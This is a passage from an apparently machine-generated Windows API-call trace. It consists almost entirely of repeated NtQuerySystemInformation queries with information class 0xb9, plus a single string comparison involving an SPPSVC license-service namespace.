Length=0x0, ResultLength=0x0) [0277.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0277.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0277.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0277.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb10, Length=0x28, ResultLength=0x0) [0277.099] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0277.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd960, Length=0x28, ResultLength=0x0) [0277.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0277.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0277.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0277.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0277.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0277.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0277.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd890, Length=0x50, ResultLength=0x0) [0277.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd890, Length=0x50, ResultLength=0x0) [0277.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd890, Length=0x50, ResultLength=0x0) [0277.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0277.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0277.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0277.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0277.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0277.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0277.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0277.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0277.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0277.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd550, Length=0x28, ResultLength=0x0) [0277.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0277.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd5d0, Length=0x28, ResultLength=0x0) [0277.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd5d0, Length=0x28, ResultLength=0x0) [0277.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd470, Length=0x20, ResultLength=0x0) [0277.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd3f0, Length=0x20, ResultLength=0x0) [0277.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd3f0, Length=0x20, ResultLength=0x0) [0277.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd3f0, Length=0x20, ResultLength=0x0) [0277.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0277.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0277.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd530, Length=0x20, ResultLength=0x0) [0277.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4c0, Length=0x20, ResultLength=0x0) [0277.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4c0, Length=0x20, ResultLength=0x0) [0277.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd7a0, Length=0x28, ResultLength=0x0) [0277.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0277.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0277.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0277.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0277.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0277.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0277.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd7a0, Length=0x28, ResultLength=0x0) [0277.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0277.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 